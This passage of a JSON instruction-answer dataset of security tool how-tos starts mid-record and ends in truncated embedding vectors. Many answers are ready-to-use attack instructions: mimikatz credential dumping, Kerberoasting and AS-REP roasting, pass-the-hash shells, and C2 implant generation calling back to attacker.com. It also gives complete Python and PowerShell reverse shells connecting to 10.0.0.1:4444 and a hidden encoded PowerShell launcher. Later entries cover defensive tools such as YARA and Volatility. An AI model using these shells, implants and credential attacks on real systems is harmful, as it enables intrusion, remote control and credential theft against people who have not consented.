crackmapexec smb target --dpapi (DPAPI secrets). crackmapexec smb target -M mimikatz -o COMMAND='sekurlsa::logonpasswords' (run module). Modules in ~/.cme/modules/. Logs in ~/.cme/logs/."},{"source":"cyber-tools","instruction":"How to perform Kerberoasting attacks?","output":"Kerberoasting - get TGS tickets for service accounts. impacket-GetUserSPNs DOMAIN/user:pass -outputfile hashes.txt (request+save). impacket-GetUserSPNs DOMAIN/user:pass -request (or just request). Windows (PowerShell): Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/target.domain.com' (request SPN ticket). klist (view tickets). mimikatz: kerberos::ask /target:HTTP/target.domain.com (request ticket). Crack with: hashcat -m 13100 hashes.txt wordlist.txt (Kerberos TGS-REP). john hashes.txt --format=krb5tgs. Mitigation: managed service accounts (gMSA), strong (>25 char) random passwords for service accounts."},{"source":"cyber-tools","instruction":"How to perform AS-REP roasting attacks?","output":"AS-REP roasting - target accounts with 'Do not require Kerberos preauth' flag. impacket-GetNPUsers DOMAIN/ -usersfile users.txt -request -dc-ip DC_IP (request AS-REP for list). impacket-GetNPUsers DOMAIN/user:pass -request (if you have creds for one user, find others). Windows (PowerShell with Rubeus): Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt. Crack with: hashcat -m 18200 hashes.txt wordlist.txt (AS-REP hashcat mode). john hashes.txt --format=krb5asrep. Enumerate: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth (PowerShell AD module)."},{"source":"cyber-tools","instruction":"How to use Evil-WinRM for Windows remote management?","output":"Evil-WinRM - Windows remote shell via WinRM. Commands: evil-winrm -i target -u admin -p password (password auth). evil-winrm -i target -u admin -H NTHASH (pass-the-hash). evil-winrm -i target -u admin -p password -s scripts/ (load scripts folder). evil-winrm -i target -u admin -p password -e binaries/ (upload binaries). Features: Bypass 4MSI (automatically AMSI bypass). `menu` shows options (DLL load, Invoke-Binary, upload/download). PowerShell scripts loadable with -s flag. Upload files: upload local.txt C:\remote.txt. Download: download C:\remote.txt local.txt."},{"source":"cyber-tools","instruction":"How to use ysoserial for Java deserialization attacks?","output":"ysoserial - Java deserialization payload generator. Commands: java -jar ysoserial.jar CommonsCollections1 'cmd /c whoami' (generate payload). java -jar ysoserial.jar JRMPClient 'attacker:1099' (RMI client). java -jar ysoserial.jar URLDNS 'http://burpcollab.net' (verify deserialization). Common gadgets: CommonsCollections1-7, CommonsBeanutils1, Jdk7u21, JRMPClient/Server, Groovy1, Spring1, Hibernate1-2. Use ysoserial.net for .NET applications. Detection: SerialKiller, Contrast, gadget-probe. Mitigation: upgrade libraries, use deserialization whitelist, non-default ObjectInputStream."},{"source":"cyber-tools","instruction":"How to use Empire/Starkiller for post-exploitation?","output":"Empire + Starkiller - post-exploitation C2. Empire server: sudo powershell-empire server (start server). Client: sudo powershell-empire client (CLI access). Starkiller web UI: connect to https://localhost:1337 (graphical interface). Key commands: listeners (list), uselistener http (HTTP listener), set Host http://attacker.com, set Port 8080, execute. usestager windows/launcher_bat (generate stager), set Listener http, execute. agents (list active), interact AGENT_ID (enter agent), shell whoami (run OS command). Modules: usemodule credentials/mimikatz/logonpasswords, usemodule situational_awareness/host/computerdetails."},{"source":"cyber-tools","instruction":"How to use Sliver C2 for command and control?","output":"Sliver C2 - implant framework. Server: sliver-server (start). Client: sliver-client (connect). Profiles: new-profile --mtls attacker.com --http attacker.com --name win64 --arch amd64 --format exe --os windows. Generate: generate --profile win64 --save /tmp/implant.exe (generate implant). generate --http http://attacker.com:80 --save beacon.exe (single-protocol). Listeners: mtls --lhost 0.0.0.0 --lport 443, http --lhost 0.0.0.0 --lport 80. When implant calls back: use IMPLANT_ID, info (show details). Commands: shell (interactive), ps, ls, cd, upload/download, screenshot, sideload (execute DLL), execute-shellcode (run shellcode), socks5 (SOCKS proxy), pivot listener (pivot listener)."},{"source":"cyber-tools","instruction":"How to use Mythic C2 for command and control?","output":"Mythic C2 - multi-agent C2 framework. Deploy: docker-compose up (start Mythic services). Web UI at https://localhost:7443. Agents: apollo (Windows .NET), poseidon (macOS), thanatos (Python cross-platform), atlas (Rust cross-platform). Creating callback: generate payload in UI. Commands per agent (e.g., poseidon): shell (OS command), download/upload, ls, cp, mv, ps, kill, socks (SOCKS proxy), portscan (TCP scanner), screencapture, keylog (keylogging). Plugin marketplace for community agents. Task chaining, browser script automation for multi-step tasks. HTTP/S, DNS, SMB, and TCP C2 profiles."},{"source":"cyber-tools","instruction":"How to use Havoc C2 for command and control?","output":"Havoc C2 - modern C2 with Demon agent. Server: sudo ./havoc server --profile ./profiles/havoc.yaotl (start server). Client: ./havoc client (GUI client). Payload config: create Listener (HTTP/S, SMB, Pivot, External), configure Host, Port, User-Agent, Headers. Generate payload: choose architecture (x64/x86), format (EXE/DLL/Shellcode), techniques. Features: sleep obfuscation (Ekko, Foliage), indirect syscalls (Hell's Gate, Halo's Gate), ETW patching, AMSI bypass, NTDLL unhooking. Callbacks: command output, file browser, screenshots, token manipulation, SOCKS proxy. Extensibility: Python plugins, custom agent support."},{"source":"cyber-tools","instruction":"How to build a reverse shell in Python?","output":"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn('/bin/sh') [Linux reverse shell]. For Windows: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);while True: buf=s.recv(1024).decode(); if buf.lower()=='exit\\n': break; o=subprocess.check_output(buf,shell=True,stderr=subprocess.STDOUT); s.send(o). Encoded: python3 -c 'EXEC'."},{"source":"cyber-tools","instruction":"How to build a reverse shell in PowerShell?","output":"PowerShell reverse shell: $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close(). One-liner: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64-encoded-command>. Use Invoke-PowerShellTcp.ps1 from Nishang for advanced features (persistence, download, upload)."},{"source":"cyber-tools","instruction":"How to perform network enumeration with Windows CMD?","output":"Windows CMD enumeration commands: systeminfo (OS/patches), whoami /all (user + privileges), net user (list users), net user USERNAME (user details), net localgroup (groups), net localgroup Administrators (admin group), net group /domain (domain groups), net group 'Domain Admins' /domain (domain admins), net share (shares), net use (mounted drives), ipconfig /all (network config), route print (routing table), arp -a (ARP cache), nslookup TARGET (DNS), netstat -ano (active connections + PIDs), tasklist /v (processes with owners), wmic product list brief (installed software), reg query (registry query), dir /s *.config (find config files)."},{"source":"cyber-tools","instruction":"How to use Bash for Linux cybersecurity scripting?","output":"Bash - Linux security scripting. Enumeration: uname -a (kernel), cat /etc/os-release (distro), id (current user), sudo -l (sudo privileges), cat /etc/passwd (users), cat /etc/shadow (hashes - need root), ps aux (processes), ss -tlnp (listening ports), netstat -tulpn (listening), find / -perm -4000 -type f (SUID binaries), find / -writable -type f 2>/dev/null (writable files), crontab -l (cron jobs), ls -la /etc/cron* (system cron), env (environment variables), cat ~/.bash_history (command history), mount (mounted filesystems), df -h (disk usage), ldd /bin/app (shared libraries). One-liners: for ip in $(seq 1 254); do ping -c 1 10.0.0.$ip | grep 'bytes from' & done (ping sweep)."},{"source":"cyber-tools","instruction":"How to use searchsploit/Exploit-DB for exploit research?","output":"Searchsploit - Exploit-DB search tool. Commands: searchsploit <term> (search exploit database). searchsploit -t <title> (search title only). searchsploit apache 2.4.49 (specific version). searchsploit -m <EDB-ID> (mirror exploit to cwd). searchsploit -x <EDB-ID> (view exploit contents). searchsploit -o (online mode for updates). searchsploit -u (update database). searchsploit --cve CVE-2021-41773 (search by CVE). Categories: remote, local, webapps, dos, shellcode. Export: searchsploit -t <term> -j (JSON output for scripting). Path: /usr/share/exploitdb/exploits/. Update with: sudo searchsploit -u."},{"source":"cyber-tools","instruction":"How to use Ghidra for reverse engineering?","output":"Ghidra - reverse engineering framework. Installation: requires JDK 17+, download from ghidra-sre.org. Create project: File > New Project > Non-Shared. Import binary: File > Import File (select PE/ELF/Mach-O). Analysis: auto-analyze (x86, ARM, MIPS). Key features: Decompiler (Window > Decompiler), Listing (disassembly view), Symbol Tree (functions, labels), Program Trees (sections), Data Type Manager (structs/reconstruction). Navigation: function graph (right-click > Graph), search > Memory / Program Text, call tree. Scripting: Python 3 (Jython) and Java scripts via Script Manager. Scripts: SymbolicPropagation, StackAnalyzer, PDB. Use Ghidra plugins + extensions for enhanced analysis."},{"source":"cyber-tools","instruction":"How to use x64dbg for Windows debugging?","output":"x64dbg - Windows debugger. Open: x64dbg.exe (x64), x32dbg.exe (x86). Key commands: F2 (breakpoint), F7 (step into), F8 (step over), F9 (run), Ctrl+F2 (restart), Ctrl+G (go to address). Breakpoints: Set on API calls (bp CreateFileW), conditional (right-click > Conditional Breakpoint). Memory map: View > Memory Map. Symbols: View > Symbols. Patches: Right-click > Assemble (modify instructions). Plugins: ScyllaHide (anti-debugging bypass), xAnalyzer (analysis), OllyDump (dump process), TitanHide (kernel-mode hiding). Scripting: x64dbgpy (Python plugin), x64_dotnet (managed code debugging). Export memory regions: right-click memory map > Dump (dump to file)."},{"source":"cyber-tools","instruction":"How to use dnSpy for .NET decompilation?","output":"dnSpy - .NET decompiler/debugger. Open file: File > Open (drag-drop .exe/.dll/.winmd). Features: decompile to C# (full source reconstruction), edit assembly (right-click method > Edit Method, then compile). Debug: F5 (start debugging), set breakpoints (F9), step through (F10/F11). Search: Ctrl+Shift+K (search by string/class/method across assemblies). Analyzer: select method > Analyze (shows callers/callees/references). Export: File > Save Module (patched assembly to disk). BAML decompiler (WPF XAML). Hex view for raw IL. Use de4dot before dnSpy on obfuscated assemblies to deobfuscate. Supports .NET Core, .NET 5+ assemblies."},{"source":"cyber-tools","instruction":"How to use Process Monitor (ProcMon) for Windows forensics?","output":"Process Monitor (ProcMon) - Windows activity monitor. Default filters: Include operations (RegSetValue, CreateFile, WriteFile, Process Create). Filter by: Process Name (include/exclude), Operation (RegOpenKey, CreateFile), Path (specific file/reg path), Result (SUCCESS, ACCESS DENIED). Key columns: Time, Process Name, PID, Operation, Path, Result, Detail. Focus on: CreateFile (file writes), WriteFile (data exfiltration), RegSetValue (persistence), Process Create (process injection), TCP/UDP Send/Recv (network). Boot logging: Enable Boot Logging in Options > Enable Boot Logging. Use Procmon.exe /BackingFile log.pml /Quiet /AcceptEula for command-line capture. Process Monitor Filter DLL for advanced regex filtering."},{"source":"cyber-tools","instruction":"How to use Sysinternals tools for system analysis?","output":"Sysinternals - Windows system tools. Key tools: Process Explorer (procexp.exe) - detailed process tree, DLL listing, handle view. Process Monitor (procmon.exe) - real-time file/registry/process monitoring. PsExec (psexec.exe) - remote execution (psexec \\\\target -u user -p pass cmd). AccessChk (accesschk.exe) - check user permissions (accesschk64 -uwdqs Users c:\\windows). Autoruns (autoruns64.exe) - all startup locations, services, drivers, scheduled tasks. Strings (strings64.exe) - extract strings from binaries. TCPView (tcpview64.exe) - TCP/UDP endpoint monitoring. Handle (handle64.exe) - open file handles by process. Sigcheck (sigcheck64.exe) - file version/signing info. All available from Microsoft Sysinternals site."},{"source":"cyber-tools","instruction":"How to use YARA for malware detection?","output":"YARA - pattern matching for malware. Rule syntax: rule RuleName { meta: description = 'description' strings: $text = 'malicious string' ascii wide nocase $hex = { 90 90 90 ?? E9 } condition: $text or $hex }. Scan: yara rule.yar target.exe (scan single file). yara -r rule.yar C:\\Windows\\System32 (recursive scan directory). yara -s rule.yar file.exe (print matching strings). yara -m rule.yar file.exe (print metadata). Modules: pe (PE files), elf (ELF), math (math functions), magic (file magic), cuckoo (Cuckoo sandbox). Includes: include 'other.yar'. Performance: compile rules with yarac for faster scans. Use with jYARA in Python: pip install yara-python, import yara, rules = yara.compile('rule.yar'), matches = rules.match('file.exe')."},{"source":"cyber-tools","instruction":"How to use Volatility 3 for memory forensics?","output":"Volatility 3 - memory forensics. Install: pip install volatility3. Memory dump acquisition: winpmem (Windows), dumpit (Magnet), liME (Linux). Analysis: vol -f memory.dmp windows.info (OS/version info). vol -f memory.dmp windows.pslist (process list). vol -f memory.dmp windows.psscan (process scan with hidden). vol -f memory.dmp windows.pstree (process tree). vol -f memory.dmp windows.netscan (network connections). vol -f memory.dmp windows.cmdline (command lines). vol -f memory.dmp windows.filescan (open file handles). vol -f memory.dmp windows.dumpfiles --pid 1234 (dump process memory). vol -f memory.dmp windows.malfind (injections/PE). vol -f memory.dmp windows.registry.hivelist (registry hives). vol -f memory.dmp windows.hashdump (SAM hashes). Output: -o output_dir."},{"source":"cyber-tools","instruction":"How to use JQ for JSON processing in security scripts?","output":"jq - JSON command-line processor. Commands: cat data.json | jq '.' (pretty-print). jq '.results' file.json (extract key). jq '.[] | select(.severity == \"high\")' vulns.json (filter). jq '.[].ip' hosts.json (extract all IPs). jq -r '.[].name' names.json (raw output, no quotes). jq 'group_by(.port) | map({port: .[0].port, count: length})' scans.json (aggregate). jq -c '.[]' file.json (compact output). jq -s 'add' *.json (merge multiple JSON files). jq '[.[] | {ip: .ip, port: .port}]' file.json (reshape objects). jq 'unique_by(.ip)' file.json (deduplicate). jq --arg ip '10.0.0.1' '.[] | select(.ip == $ip)' file.json (variable binding). jq -f filter.jq data.json (use filter file)."},{"source":"cyber-tools","instruction":"How to use Nmap NSE scripts for vulnerability scanning?","output":"NSE - Nmap Scripting Engine. Command: nmap -sV --script=<script> <target>. nmap --script=vuln <target> (all vulnerability checks). nmap --script=http-enum <target> (web directory enum). nmap --script=smb-enum-shares <target> (SMB shares). nmap --script=rdp-sec-check <target> (RDP security). nmap --script=ssl-enum-ciphers -p 443 <target> (TLS cipher audit). nmap --script=dns-zone-transfer <target> (DNS zone transfer). nmap --script=ssh2-enum-algos <target> (SSH algorithms). nmap --script=mysql-empty-password <target> (MySQL default creds). Custom NSE: /usr/share/nmap/scripts/ (script location). Write NSE: in Lua with description, author, categories, portrule, action function. Update NSE DB: nmap --script-updatedb."},{"source":"cyber-tools","instruction":"How to use Nuclei for automated vulnerability scanning?","output":"Nuclei - template-based vulnerability scanner. Commands: nuclei -u http://target.com (scan single target). nuclei -l targets.txt (scan list). nuclei -t cves/ -u http://target.com (scan CVE templates only). nuclei -t ~/nuclei-templates/ -u http://target.com -severity critical,high (by severity). nuclei -u http://target.com -o results.json -json (JSON output). nuclei -u http://target.com -stats (real-time stats). nuclei -u http://target.com -rate-limit 100 (requests/second). Custom templates: id: custom-check, info: { name: '...', severity: medium }, requests: [{ method: GET, path: ['/admin'], matchers: [{ type: word, words: ['Dashboard', 'Login'] }] }]. Templates dir: ~/nuclei-templates/. Update: nuclei -update-templates."}],"embeddings":[[0.009120378,0.09064031,-0.17452663,-0.03858346,0.12178779,0.0032837472,0.06587027,0.0327301,-0.03271182,-0.014285041,-0.017753245,0.0030900948,0.09615161,-0.010461997,-0.014596935,-0.030800926,0.021648446,-0.08485764,-0.0033373055,0.015322297,-0.01095969,0.008006775,0.028379612,-0.04387945,0.033807952,-0.03954145,-0.023500215,-0.001053148,-0.0059889634,-0.007408375,0.010040444,-0.03652997,0.0018727919,-0.021642767,-0.07131896,-0.02355997,0.011257597,0.019896222,-0.004125284,0.009718628,0.013396693,-0.013005387,0.0048546703,-0.012753145,0.0015217678,0.0072360407,0.031719312,-0.016917398,0.024121106,-0.03446864,0.03539785,-0.041377008,0.0526925,-0.028027037,0.10042004,0.042857114,-0.018968722,-0.00310061,-0.0056760646,-0.08877068,0.14892712,0.08273345,-0.103470206,0.07457438,0.0054217787,-0.00877681,-0.046027683,0.02663773,0.021733448,-0.044232808,0.0057225884,-0.004283464,-0.014349273,0.020984044,-0.044469945,-0.039068073,-0.03110466,-0.030295346,-0.03464102,0.051334444,0.012771267,-0.032261007,0.05821456,0.009881267,0.05940146,-0.0049151625,-0.026785266,0.026060894,-0.015258439,0.1181979,-0.0030618887,0.017759996,0.04645782,0.015829781,-0.06120272,0.0044793813,-0.0120307645,0.011557945,-0.032880317,-0.038491964,-0.027664993,0.007870975,0.007740803,-0.03561104,-0.01570929,0.0049556512,0.012137731,0.052320816,-0.03457579,-0.0006016786,-0.045533292,0.088791266,-0.015057988,-0.0078748455,-0.04161411,-0.02310446,0.022249045,0.0010302047,-0.0005705794,0.025271824,-0.011567342,-0.055511158,-0.035834126,0.026386065,0.013199868,0.020905288,-0.04732561,0.011565743,-0.017173238,-0.04951133,0.017869346,0.0046608048,-0.039421447,-0.013656209,0.014892686,0.086316034,-0.046741366,0.0041033006,0.029315092,0.026759133,-0.029227477,0.014718999,-0.037798494,-0.024539387,0.0000052040145,-0.018333431,-0.021410212,0.012186546,0.0043700347,-0.015136859,-0.024859471,0.032993205,-0.004698244,-0.03164026,0.047021523,-0.019986816,0.020702353,0.016834134,0.008013796,0.015017013,0.07174879,0.023263859,-0.016120924,0.044362754,0.0058068545,-0.017194241,-0.033934053,0.027676748,0.048622467,0.04390422,-0.0547058,-0.0146697275,0.015792575,0.00045849918,0.010736493,0.01721844,0.090038836,-0.047152016,-0.016675886,-0.055558495,0.021243546,-0.032740634,0.052823186,0.029740555,-0.023714954,-0.019721318,0.021166053,0.035284422,-0.002343263,-0.0575402,-0.012997003,-0.0010235836,-0.03405394,0.005621055,-0.04912955,-0.040199764,0.038915012,-0.017249629,0.05087101,-0.029646704,-0.043265164,0.011020147,-0.0388923,0.020333989,-0.0613369,0.045967203,-0.0120163495,0.036276,-0.017205676,0.055252425,0.057707183,0.003982807,0.0223614,0.009221957,-0.0067253807,-0.026910208,-0.028883558,-0.02047727,-0.05488126,-0.0010170718,0.035156365,-0.027015572,0.016181448,0.048758414,0.0268994,-0.008638466,-0.03913502,-0.00096481363,-0.012465327,-0.0012980081,0.0064897714,-0.09222346,0.04659477,0.0012576279,0.0063908678,0.033565927,0.015965741,0.07467693,-0.010654803,-0.002373854,0.015239467,0.005282346,-0.03626597,-0.02103553,-0.044387143,-0.0250218,-0.029978797,-0.029339114,-0.023095822,0.01808968,-0.024108138,0.00868916,0.0037033088,0.007957583,0.014849664,-0.001890606,-0.018998224,-0.0034039575,0.010716158,0.004950898,0.035990357,-0.006312402,0.010128008,-0.01112825,-0.017543627,-0.019977678,-0.023331787,-0.0042428346,0.008280161,-0.012647315,0.018152665,0.042720195,0.041595105,0.021236999,-0.0086528,-0.01444817,-0.0051659886,-0.021004528,-0.003200196,0.010137532,-0.057176705,-0.057781033,-0.03152538,0.02159776,0.0082308045,0.02361848,0.035217788,-0.031165635,0.0064759664,-0.029881515,0.0124835605,-0.01036342,-0.014534154,0.020384595,-0.011019462,0.047410637,0.06220489,0.007697037,0.02529354,-0.047317334,-0.00092177006,0.03467818,0.055760346,0.030568125,-0.012998457,-0.008079858,0.016849037,-0.053992808,-0.013867138,-0.021521391,-0.060769178,0.01788885,-0.02752428,-0.013699555,-0.042700954,-0.005859693,-0.00071192224,0.014424995,0.028612249,-0.018564038,0.0051393793,-0.056634918,0.0032946563,-0.04796314,0.00046878363,0.066529,-0.021350855,-0.00093718607,-0.014898216,-0.02073182,0.06795937,0.041475967,0.0058909166,-0.054719046,-0.06073675,0.012400298,-0.005177717,0.009610056,0.039067212,0.0061030397,0.07038214,-0.014707797,-0.009878213,0.011105505,0.014378739,0.054788385,-0.025324509,-0.050177187,0.024748245,0.035239626,-0.0020923903,0.021619754,-0.053861424,-0.032602478,0.00675074,0.029302526,0.042081196,0.015840784,0.011493629,-0.03738858,0.06361084,0.013234821,0.005264486,-0.041816507,-0.02987925,0.001505139,0.04241738,0.031067416,-0.008707412,0.0033111859,-0.05673067,-0.09329859,-0.003101127,0.03856128,-0.013532691,0.035695456,-0.04413345,-0.015677555,-0.0032273878,-0.01578454,0.018920392,-0.022448326,0.011667376,0.008892822,0.019970702,-0.021285385,0.005109073,-0.024234807,0.02785879,0.06377784,-0.00593293,-0.042263366,-0.037174065,0.040614136,0.019012988,0.006971539,-0.0042613586,0.0005830586,-0.017169714,0.041967757,-0.016710414,-0.033941034,-0.0017551171,0.019094948,-0.039228503,0.0536951,-0.035972506,-0.0010067539,0.04188338,-0.0022577513,0.036440935,0.008647579,-0.024133269,-0.05722331,0.024978278,-0.0028741502,0.005859302,0.029494036,-0.020277767,-0.012193235,0.033071235,0.014383936,0.013678045,-0.0066448636,-0.03849967,0.04277832,0.026883313,0.061006173,0.021904914,-0.076886274,0.060480587,0.016879268,0.019752687,-0.0067332,0.042232573,0.025293916,0.031963266,0.03265608,0.041949414,0.065285206,0.03525184,-0.014119206,-0.015216456,-0.0207372,-0.007910475,0.06123847,0.06558218,-0.04665978,-0.057047673,0.033330977,0.02087065,0.034267828,0.057980355,0.0024518408,0.110022075,-0.020864712,-0.003859845,0.012193073,0.047317028,0.0042030006,0.026416225,-0.0038770828,-0.075562924,0.0574365,-0.010410291,-0.018404378,-0.011819683,-0.031095646,0.008483232,0.06443885,-0.04887232,-0.00018254115,0.052158985,0.007061707,-0.018251259,0.0130857285,-0.050645884,-0.01112497,-0.0019693964,0.048194826,0.036273092,-0.048338283,-0.012873921,-0.047293458,-0.019381981,0.035130754,0.0192652,-0.0077553014,-0.0005989784,-0.014104614,0.08220462,0.028439756,0.03698779,-0.02011149,-0.0612734,-0.03246111,-0.010931117,0.06659591,0.042423055,0.02566151,0.00011951927,0.022644274,-0.02150973,0.013782485,0.045969784,-0.012795392,0.08837245,-0.052176125,-0.053098217,0.033413026,-0.0036713728,0.0018861453,0.010535918,0.03330127,0.023870694,-0.040520716,0.057372738,0.046400685,-0.037193343,-0.02436569,0.046222184,-0.0026759566,-0.050443117,-0.00939046,-0.08961888,-0.00872687,-0.0019487893,-0.034536093,-0.0036128266,0.0034750113,0.034126,0.02852405,-0.048323322,-0.017748514,-0.019373348,-0.0047917278,0.027326671,-0.0020450037,0.0049045417,-0.0013878618,0.053234443,0.079522125,0.05685668,-0.010696394,0.004476557,-0.010371766,-0.00858761,0.015844496,0.009606364,-0.06301753,0.03446523,-0.06031323,-0.026625104,-0.011805151,0.05180971,-0.005071854,-0.03460292,-0.056009058,-0.034479722,-0.05099828,-0.014751612,0.02944955,0.04368537,0.020664904,0.034945544,-0.018561017,-0.031272374,-0.012681434,0.00085592363,0.052632317,-0.012518704,-0.08727344,-0.042473093,-0.0053598383,-0.03254701,-0.0019573942,0.027833827,-0.003686278,-0.06089908,-0.057057783,0.027243145,-0.0511076,0.03494787,0.01732336,-0.017848046,0.0061380183,-0.0833915,0.01460125,0.006046396,-0.034712803,-0.020652167,-0.00019924289,0.0030749757,-0.031897143,-0.03181932,-0.020352118,0.011016677,-0.01872406,-0.046817586,-0.051715296,-0.030828523,0.055516627,0.033871762,-0.043967687,0.029558372,0.055803854,0.020241672,-0.0030678567,0.008441647,-0.010776643,-0.009632264,0.025061412,-0.042264033,0.009638251,0.029480653,-0.04782909,0.05231882,-0.017201327,0.0107068885,-0.02335854,-0.027860222,-0.056338474,0.08846128,-0.07284967,0.027938252,-0.014879031,-0.042391773,-0.00492739,0.024190353,0.009515686,-0.053801026,-0.008598931,-0.053790674,0.0030687344,-0.080024235,0.0025620894,-0.023514284,0.060971316,0.00081801263,0.03888752,0.01404528,-0.04428773,-0.0002465091,0.009134811,0.013394977,-0.008021155,0.012304602,0.07616841,0.046128854,0.008544172,0.08465801,0.07947943,-0.00505198,-0.027467642,-0.0025235375,0.025025394,0.007551752,-0.043509703,-0.024553642,-0.018868348,0.011788759,-0.029200437,-0.0060996246,-0.007650392,0.03798398,0.0005434384,-0.053972065,0.009283734,-0.051761735,-0.051193297,0.04090462,0.007472074,0.029170213,-0.029795477,0.03497625,0.0026194896,0.030300304,0.03485958,-0.03170278,-0.027518477,-0.01910318,0.01128493,0.015806086,-0.0137268035,-0.005858397,-0.018310972,0.016671557,-0.014380217,-0.058436207,-0.03773371,-0.029615216,-0.011892577,0.011543327,0.0068042236,-0.022594247,0.01050809,-0.012326931,0.008322374,0.01932184,0.07984485,-0.0009868206,-0.001408307,0.015442078,0.036544118,-0.0032685017,0.0010557637,-0.004765252,0.008183664,0.0035837244,-0.05840357,-0.007310872,-0.002036384,-0.030168,0.078100316,0.004497704,0.023164243,0.025860466,-0.012373025,-0.019583678,-0.015895166,0.055573817,-0.0060066124,-0.022112709,0.006779015,-0.009381383,-0.000003253266,0.008740618,-0.055449925,0.021984044,0.019554423,-0.010080927,-0.08315748,-0.028076466,0.034146853,0.037582196,0.012725236,-0.024650237,0.011333924,-0.043470845,-0.010373491,-0.017427111,0.06486699,-0.00765707,-0.00094686396,-0.017834548,-0.019580409,-0.043274093,0.06045968,-0.0024840622,-0.01860288,0.017101767,0.002159576,-0.007073639,0.006738984,-0.042186268,0.011661504,-0.021604339,0.013727865,0.15370314,0.013713109,0.02296914,-0.026020246,0.038614154,-0.037757948,-0.052882977,-0.013656673,-0.029825252,-0.03778898],[-0.0061797546,0.059221588,-0.18597707,-0.03681641,0.09260522,0.020944169,0.040279835,0.015393424,-0.0044996426,-0.008089432,-0.025483202,0.044241574,0.12293831,-0.010672088,-0.003811194,-0.031808343,-0.010086485,-0.049090292,-0.034324627,0.027741,-0.015236787,-0.038056523,0.010900063,-0.033303063,0.06951476,0.058536448,-0.03300574,-0.030860685,-0.017132074,0.023446912,0.026971748,-0.05706847,-0.05820047,0.03549673,-0.05629844,0.007863983,0.049650807,0.05608228,-0.01765929,0.016746342,0.013691348,0.036145367,-0.0074394303,0.0041537858,-0.015977925,0.020387955,-0.00050572684,-0.029251521,0.07873787,-0.047158238,-0.02982121,-0.015550501,0.023067707,0.06500622,0.070143014,0.0265353,-0.03911483,-0.009339642,0.024220861,-0.008490086,0.08831366,0.060099147,-0.071217515,0.04584923,0.040360987,-0.044265993,-0.035062894,0.035554,0.01832343,-0.018532325,0.032498326,-0.03348855,-0.009610583,0.021900808,-0.049476627,-0.061298177,-0.017570952,-0.014592917,-0.014439328,0.066441536,0.051982738,0.032252427,0.07174896,0.031015038,0.019228354,-0.023361266,-0.05350177,0.0041495576,-0.060632885,0.057320293,0.016216539,0.0055182646,0.01629254,-0.002245008,-0.05812979,0.039895978,0.017079089,0.036978204,-0.052755374,-0.006918816,-0.028310707,-0.013073048,0.02272258,-0.023127444,0.04405603,0.03581703,0.017493252,0.019299015,-0.020018745,-0.022045355,-0.029969454,0.034206335,-0.038274173,-0.026967527,0.004476229,0.0022864733,0.0105013205,-0.0096209375,-0.03546246,0.052195217,0.030813249,-0.010793017,-0.0077360994,0.0604415,0.0047347387,0.0052587283,-0.035502013,0.029756881,-0.024310958,-0.013771377,-0.0029958168,-0.019446915,-0.029450726,-0.03766529,0.027463028,0.100175284,-0.056838423,-0.03146258,-0.012150978,0.01713651,0.021909984,0.029421765,-0.0038514594,-0.031017523,-0.03236308,-0.027412426,0.021920359,-0.022589795,-0.0464346,-0.0044437894,0.0317756,-0.001968394,-0.011858205,0.0075328765,0.013230582,-0.005524456,0.016662003,0.0130261,0.02674187,0.030341182,0.051384956,0.023495818,-0.0031761436,0.045354135,-0.0027991105,-0.05207421,-0.015941914,0.014908708,-0.014625105,0.069138706,-0.064869076,-0.026856674,0.0207765,-0.026123822,-0.024465524,-0.037701253,0.0739358,-0.010714779,0.03221434,0.0039828704,0.035837628,-0.088096775,0.080098316,0.027429607,0.0034412222,-0.050283607,0.0004572874,0.021973064,0.03600871,-0.0071886284,0.02609722,-0.0382334,-0.04964246,-0.033168666,-0.045178056,-0.05085816,0.002105431,-0.013478128,0.016921412,-0.020083882,-0.026730172,-0.018981472,-0.029806716,-0.042629257,-0.031185336,0.04923736,0.015545182,0.030883338,-0.035896175,0.038964752,0.06470415,-0.02393864,0.008581558,0.030325368,-0.015911508,-0.008309547,-0.014959959,-0.036096115,-0.020071466,0.010113684,0.009582712,-0.014389304,-0.02206838,-0.016600909,0.0306906,0.0078648925,-0.044435486,-0.025360908,-0.0063322433,0.011843849,0.023746511,-0.055364676,0.02536355,0.024052389,0.03111868,0.036360707,-0.011785735,0.048814457,-0.03278335,0.036207166,0.004182349,0.04703726,-0.000037038608,-0.026019666,-0.011465273,-0.03991379,0.016726105,-0.018429892,-0.016424356,0.036581174,0.0045771515,0.010657668,0.009318459,0.047820617,0.040247366,-0.05000634,-0.023266533,-0.01455657,0.028660102,0.017201068,0.07054343,-0.021288449,0.020640116,-0.042935368,-0.012982045,-0.043217286,-0.029582176,-0.011779503,0.007012802,0.033882983,0.03353768,0.07509255,0.027103556,0.025726283,-0.020271905,0.018349022,-0.010807881,-0.036557306,-0.029801166,-0.00128708,-0.03998449,0.031242292,-0.028487302,0.0051373425,-0.012338951,0.002887769,0.014307647,0.007882013,0.027937517,-0.017398456,-0.004897588,-0.05879989,-0.015960867,0.022731267,0.008591981,0.056532778,0.044398706,-0.026675778,0.02219263,-0.03282035,0.027575223,0.019886835,0.07103179,0.0142500745,-0.0038163576,-0.020023964,0.023297388,0.021641228,0.016375942,-0.039695688,-0.060851783,0.008125619,-0.0034210824,0.00080865383,0.007863304,-0.01187031,0.03710478,0.023099203,0.04748352,-0.014153456,0.038653027,-0.048865754,0.0001547709,-0.027574325,-0.042810917,0.036012374,-0.0021495114,-0.011746373,-0.02449708,-0.021251561,0.040266518